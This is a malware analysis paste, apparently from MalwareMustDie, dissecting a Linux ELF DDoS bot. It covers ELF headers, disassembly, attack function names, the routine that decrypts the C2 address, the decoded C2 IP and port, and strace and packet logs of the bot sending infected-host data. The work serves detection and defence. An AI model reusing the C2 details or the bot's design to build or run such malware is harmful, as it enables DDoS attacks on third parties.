Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMustDie China ELF DDoSer Analysis
- # Sample: 9a2a00f4bba2f3e0b1211a1f0cb48896
- # ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
- # VT: https://www.virustotal.com/en/file/bb4786695774ae7777200a78e56db83ad5d5bdf1c1b84ef86dd796f7c9a3e1b4/analysis/1409687242/
- # Reference1 analysis (x64 base compilation, older version, new dates, CNC: 199.101.117.142)
- https://www.virustotal.com/en/file/8fa44a7b3eb707f584b223792bdb78b1e5f69a40dba20634094077c2f0287bca/analysis/1409730903/
- # Reference2 analysis (same compilation, same CNC IP 61.147.103.21 w/u different port number as CNC)
- https://www.virustotal.com/en/file/d2b3ce2195b1422c165faeb1fbbdd098f13df6cf6595fb18f8d618cd78df597c/analysis/1409729124/
- # =============================
- # Binary Analysis
- # =============================
- ELF Header:
- Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
- Class: ELF32
- Data: 2s complement, little endian
- Version: 1 (current)
- OS/ABI: UNIX - System V
- ABI Version: 0
- Type: EXEC (Executable file)
- Machine: Intel 80386
- Version: 0x1
- Entry point address: 0x8048120
- Start of program headers: 52 (bytes into file)
- Start of section headers: 1199680 (bytes into file)
- Flags: 0x0
- Size of this header: 52 (bytes)
- Size of program headers: 32 (bytes)
- Number of program headers: 5
- Size of section headers: 40 (bytes)
- Number of section headers: 28
- Section header string table index: 25
- Section Headers:
- [Nr] Name Type Addr Off Size ES Flg Lk Inf Al
- [ 0] NULL 00000000 000000 000000 00 0 0 0
- [ 1] .note.ABI-tag NOTE 080480d4 0000d4 000020 00 A 0 0 4
- [ 2] .init PROGBITS 080480f4 0000f4 000017 00 AX 0 0 4
- [ 3] .text PROGBITS 08048120 000120 0e3800 00 AX 0 0 32
- [ 4] __libc_freeres_fn PROGBITS 0812b920 0e3920 000f6e 00 AX 0 0 4
- [ 5] __libc_thread_fre PROGBITS 0812c890 0e4890 0000e2 00 AX 0 0 4
- [ 6] .fini PROGBITS 0812c974 0e4974 00001a 00 AX 0 0 4
- [ 7] .rodata PROGBITS 0812c9a0 0e49a0 021eee 00 A 0 0 32
- [ 8] __libc_subfreeres PROGBITS 0814e890 106890 00003c 00 A 0 0 4
- [ 9] __libc_atexit PROGBITS 0814e8cc 1068cc 000004 00 A 0 0 4
- [10] __libc_thread_sub PROGBITS 0814e8d0 1068d0 000004 00 A 0 0 4
- [11] .eh_frame PROGBITS 0814e8d4 1068d4 016d08 00 A 0 0 4
- [12] .gcc_except_table PROGBITS 081655dc 11d5dc 005049 00 A 0 0 4
- [13] .tdata PROGBITS 0816b628 122628 000014 00 WAT 0 0 4
- [14] .tbss NOBITS 0816b63c 12263c 00001c 00 WAT 0 0 4
- [15] .ctors PROGBITS 0816b63c 12263c 00002c 00 WA 0 0 4
- [16] .dtors PROGBITS 0816b668 122668 00000c 00 WA 0 0 4
- [17] .jcr PROGBITS 0816b674 122674 000004 00 WA 0 0 4
- [18] .data.rel.ro PROGBITS 0816b680 122680 00063c 00 WA 0 0 32
- [19] .got PROGBITS 0816bcbc 122cbc 00005c 04 WA 0 0 4
- [20] .got.plt PROGBITS 0816bd18 122d18 00000c 04 WA 0 0 4
- [21] .data PROGBITS 0816bd40 122d40 001034 00 WA 0 0 32
- [22] .bss NOBITS 0816cd80 123d74 0091d8 00 WA 0 0 32
- [23] __libc_freeres_pt NOBITS 08175f58 123d74 000020 00 WA 0 0 4
- [24] .comment PROGBITS 00000000 123d74 000fa5 00 0 0 1
- [25] .shstrtab STRTAB 00000000 124d19 000126 00 0 0 1
- [26] .symtab SYMTAB 00000000 1252a0 018110 10 27 1246 4
- [27] .strtab STRTAB 00000000 13d3b0 03224e 00 0 0 1
- Program Headers:
- Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
- LOAD 0x000000 0x08048000 0x08048000 0x122625 0x122625 R E 0x1000
- LOAD 0x122628 0x0816b628 0x0816b628 0x0174c 0x0a950 RW 0x1000
- NOTE 0x0000d4 0x080480d4 0x080480d4 0x00020 0x00020 R 0x4
- TLS 0x122628 0x0816b628 0x0816b628 0x00014 0x00030 R 0x4
- GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
- Section to Segment mapping:
- Segment Sections...
- 00 .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
- 01 .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
- 02 .note.ABI-tag
- 03 .tdata .tbss
- Offset 0x000000d4 | len x00000020:
- Owner Data size Description
- GNU 0x00000010 NT_VERSION (version)
- // Notes:
- no dynamic section
- no relocations
- no unwind sections
- # =============================
- # Reversing w/debug PoC
- # =============================
- // first section reversed (for characteristic)
- ;-- section..text:
- 0x08048120 31ed xor ebp, ebp
- 0x08048122 5e pop esi
- 0x08048123 89e1 mov ecx, esp
- 0x08048125 83e4f0 and esp, 0xfffffff0
- 0x08048128 50 push eax
- 0x08048129 54 push esp
- 0x0804812a 52 push edx
- 0x0804812b 68f4c20c08 push sym.__libc_csu_fini ; 0x080cc2f4
- 0x08048130 689cc20c08 push sym.__libc_csu_init ; 0x080cc29c
- 0x08048135 51 push ecx
- 0x08048136 56 push esi
- 0x08048137 681ca70408 push sym.main ; 0x0804a71c
- 0x0804813c e8cf390800 call sym.__libc_start_main
- 0x080cbb10(unk, unk, unk, unk, unk, unk, unk, unk) ; sym.__libc_start_main
- 0x08048141 f4 hlt
- 0x08048142 90 nop
- 0x08048143 90 nop
- // Chinese lang
- .rodata:081301A0 aINZD db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
- 0x00747E0 CUNG5
- 0x007518F CUNG
- 0x0075693 B4CUNG
- 0x0102520 i18n:1999
- :
- // config:
- 0x00E5C22 fake.cfg
- // template:
- %d
- %d.%d.%d.%d:%d.%d.%d.%d
- %d:%d
- // poc:
- # cat fake.cfg
- 0
- YOUR-IP-HERE:AND-HERE
- 10000:60000
- // get ethernet IP address local to be written in the fake.cfg:
- getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0
- //testing internet connection by baidu.com (DNS query)
- 0x00E50FD www.baidu.com
- // PoC:
- sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
- recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74
- // compile/compat traces:
- 0x0124CC0 GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)
- 0x0124CED GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9)
- // Sources:
- 'crtstuff.c'
- 'Fake.cpp'
- 'Global.cpp'
- 'main.cpp'
- 'Manager.cpp'
- 'ProtocolUtil.cpp'
- 'ServerIP.cpp'
- 'StatBase.cpp'
- 'ThreadAttack.cpp'
- 'ThreadAttackKernal.cpp'
- 'ThreadHostStatus.cpp'
- 'ThreadTaskManager.cpp'
- 'ThreadTimer.cpp'
- 'AutoLock.cpp'
- 'FileOp.cpp'
- 'Log.cpp'
- 'Md5.cpp'
- 'Media.cpp'
- 'NetBase.cpp'
- 'ThreadCondition.cpp'
- 'Thread.cpp'
- 'ThreadMutex.cpp'
- 'Utility.cpp'
- // And the ThreadAttack.cpp is the key function to make these
- // attacks/offensive malicious activities calls:
- CThreadAttack::ProcessMain(void)
- CThreadAttack::EmptyConnectionAtk(CSubTask &)
- CThreadAttack::HttpAtk(CSubTask &)
- CThreadAttack::FakeUserAtk(CSubTask &)
- CThreadAttack::Stop(void)
- CThreadAttack::DomainInitEx(CRandArray &,char const*)
- CThreadAttack::DomainRandEx(CRandArray &,int &)
- CThreadAttack::CrossPkt(int)
- CThreadAttack::~CThreadAttack()
- CThreadAttack::CThreadAttack(CManager *)
- CThreadAttack::Start(CCmdMessage *)
- CThreadAttack::InitCrossPkts(std::vector<uint,std::allocator<uint>..
- CThreadAttack::PktAtk(CSubTask &,std::vector<uint,std::allocator<..
- // Key Attacks Noted beside DDoS:
- 0x805478A ; CThreadAttack::EmptyConnectionAtk(CSubTask &)
- 0x805478Apublic _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask
- 0x805478A_ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask proc near
- 0x805478A push ebp
- 0x805478B mov ebp, esp
- 0x805478D leave
- 0x805478E retn
- 0x805478E
- 0x805478E _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask endp
- 0x8054790 ; CThreadAttack::HttpAtk(CSubTask &)
- 0x8054790public _ZN13CThreadAttack7HttpAtkER8CSubTask
- 0x8054790_ZN13CThreadAttack7HttpAtkER8CSubTask proc near
- 0x8054790 push ebp
- 0x8054791 mov ebp, esp
- 0x8054793 leave
- 0x8054794 retn
- 0x8054794
- 0x8054794 _ZN13CThreadAttack7HttpAtkER8CSubTask endp
- 0x8054796 ; CThreadAttack::FakeUserAtk(CSubTask &)
- 0x8054796public _ZN13CThreadAttack11FakeUserAtkER8CSubTask
- 0x8054796_ZN13CThreadAttack11FakeUserAtkER8CSubTask proc near
- 0x8054796 push ebp
- 0x8054797 mov ebp, esp
- 0x8054799 leave
- 0x805479A retn
- 0x805479A
- 0x805479A _ZN13CThreadAttack11FakeUserAtkER8CSubTask endp
- // Spawn processes and connecting to the CNC (noted 44 process will be spawned for the callbacks):
- :
- 0x80532D2 sub esp, 214h ; Integer Subtraction
- 0x80532D8 lea ecx, [ebp+var_10C] ; Load Effective Address
- 0x80532DE mov edx, offset _ZZN9CServerIP10InitializeEvE4C_48 ; CServerIP::Initialize(void)::C.48 <======
- 0x80532E3 mov eax, 100h
- 0x80532E8 sub esp, 4 ; Integer Subtraction
- 0x80532EB push eax
- 0x80532EC push edx
- 0x80532ED push ecx
- 0x80532EE call memcpy ; Call Procedure
- 0x80532F3 add esp, 10h; Add
- 0x80532F6 lea ecx, [ebp+var_20C] ; Load Effective Address
- 0x80532FC mov edx, offset _ZZN9CServerIP10InitializeEvE4C_49 ; CServerIP::Initialize(void)::C.49 <======
- 0x8053301 mov eax, 100h
- 0x8053306 sub esp, 4 ; Integer Subtraction
- 0x8053309 push eax
- 0x805330A push edx
- 0x805330B push ecx
- 0x805330C call memcpy ; Call Procedure
- 0x8053311 add esp, 10h; Add
- 0x8053314 push 27h
- 0x8053316 push offset a7005601212 ; "70/056/012/12" ; <============================
- 0x805331B push 0FFh
- 0x8053320 lea eax, [ebp+var_10C] ; Load Effective Address
- 0x8053326 push eax
- 0x8053327 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char const*,int)
- 0x805332C add esp, 10h; Add
- 0x805332F push 0Ah
- 0x8053331 push offset a63551; "63551" ; <============================
- 0x8053336 push 0FFh
- 0x805333B lea eax, [ebp+var_20C] ; Load Effective Address
- 0x8053341 push eax
- 0x8053342 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char const
- // Heres the decryption codes for cracking CNC..:
- 0x8062EF0
- 0x8062EF0 ; CUtility::DeCrypt(char *, int, char const*, int)
- 0x8062EF0 public _ZN8CUtility7DeCryptEPciPKci
- 0x8062EF0 _ZN8CUtility7DeCryptEPciPKci proc near ; CODE XREF: CServerIP::Initialize(void)
- 0x8062EF0 ; CServerIP::Initialize(void)
- 0x8062EF0
- 0x8062EF0 var_4= dword ptr -4
- 0x8062EF0 arg_0= dword ptr 8
- 0x8062EF0 arg_4= dword ptr 0Ch
- 0x8062EF0 arg_8= dword ptr 10h
- 0x8062EF0 arg_C= dword ptr 14h
- 0x8062EF0
- 0x8062EF0 push ebp
- 0x8062EF1 mov ebp, esp
- 0x8062EF3 sub esp, 10h; Integer Subtraction
- 0x8062EF6 mov [ebp+var_4], 0
- 0x8062EFD jmp short loc_8062F36 ; Jump
- 0x8062EFD
- 0x8062EFF
- 0x8062EFF loc_8062EFF: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062EFF mov eax, [ebp+var_4]
- 0x8062F02 and eax, 1 ; Logical AND
- 0x8062F05 test al, al ; Logical Compare
- 0x8062F07 jzshort loc_8062F1E ; Jump if Zero (ZF=1)
- 0x8062F07
- 0x8062F09 mov eax, [ebp+var_4]
- 0x8062F0C mov edx, eax
- 0x8062F0E add edx, [ebp+arg_0] ; Add
- 0x8062F11 mov eax, [ebp+var_4]
- 0x8062F14 add eax, [ebp+arg_8] ; Add
- 0x8062F17 mov al, [eax]
- 0x8062F19 inc eax ; Increment by 1
- 0x8062F1A mov [edx], al
- 0x8062F1C jmp short loc_8062F31 ; Jump
- 0x8062F1C
- 0x8062F1E
- 0x8062F1E loc_8062F1E: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F1E mov eax, [ebp+var_4]
- 0x8062F21 mov edx, eax
- 0x8062F23 add edx, [ebp+arg_0] ; Add
- 0x8062F26 mov eax, [ebp+var_4]
- 0x8062F29 add eax, [ebp+arg_8] ; Add
- 0x8062F2C mov al, [eax]
- 0x8062F2E dec eax ; Decrement by 1
- 0x8062F2F mov [edx], al
- 0x8062F2F
- 0x8062F31
- 0x8062F31 loc_8062F31: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F31 lea eax, [ebp+var_4] ; Load Effective Address
- 0x8062F34 inc dword ptr [eax] ; Increment by 1
- 0x8062F34
- 0x8062F36
- 0x8062F36 loc_8062F36: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F36 mov eax, [ebp+var_4]
- 0x8062F39 cmp eax, [ebp+arg_C] ; Compare Two Operands
- 0x8062F3C jge short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
- 0x8062F3C
- 0x8062F3E mov eax, [ebp+var_4]
- 0x8062F41 cmp eax, [ebp+arg_4] ; Compare Two Operands
- 0x8062F44 jge short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
- 0x8062F44
- 0x8062F46 mov eax, [ebp+var_4]
- 0x8062F49 add eax, [ebp+arg_8] ; Add
- 0x8062F4C mov al, [eax]
- 0x8062F4E test al, al ; Logical Compare
- 0x8062F50 jnz short loc_8062EFF ; Jump if Not Zero (ZF=0)
- 0x8062F50
- 0x8062F52
- 0x8062F52 locret_8062F52: ; CODE XREF: CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F52 ; CUtility::DeCrypt(char *,int,char const*,int)
- 0x8062F52 leave; High Level Procedure Exit
- 0x8062F53 retn ; Return Near from Procedure
- 0x8062F53
- 0x8062F53 _ZN8CUtility7DeCryptEPciPKci endp
- 0x8062F53
- // CNC Decoded:
- 61.147.103.21:54460
- // PoC-ed:
- connect(3, {sa_family=AF_INET, sin_port=htons(54460), sin_addr=inet_addr("61.147.103.21")}, 16) = -1 EINPROGRESS (flag)
- send(3, "\270\v\0\0\0N.%EN.%E\20'`\352MMD-IS-BANGING-YOU-B1TCH! x.x.x.x"..., 401, 0) = 401
- // Spawning process PoC (44 rounds w/ one parent as per reversed)
- Process 17553 detached
- Process 17552 detached
- :
- Process 17593 detached
- Process 17594 detached
- // CNC communication:
- // Two steps communication:
- // 1. sent establish HTTP request to 180.76.3.151
- socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
- setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
- setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0
- fcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)
- fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0
- connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("180.76.3.151")}, 16) = -1 EINPROGRESS
- x.x.x.x 180.76.3.151 TCP 74 48417 > http [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=895351513 TSecr=0 WS=128
- 180.76.3.151 x.x.x.x TCP 74 http > 48417 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1440 SACK_PERM=1
- x.x.x.x 180.76.3.151 TCP 54 48417 > http [RST] Seq=1 Win=0 Len=0
- // 2. sent infected machine data to CNC:
- x.x.x.x 61.147.103.21 TCP 455 33911 > 54460 [PSH, ACK] Seq=1 Ack=1 Win=14720 Len=401
- 00000000 b8 0b 00 00 00 4e 2e 25 45 4e 2e 25 45 10 27 60 .....N.% EN.%E.**
- 00000010 ea 4c 69 6e 75 78 20 33 2e 32 2e 30 2d 34 2d 61 .Linux 3 .2.0-4-a
- 00000020 6d 64 36 34 00 00 00 00 00 00 00 00 00 00 00 00 md64.... ........
- 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
- 00000190 00 .
- ----
- #MalwareMustDie!
- /* This analysis post is dedicated to all UNIX sysadmins */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement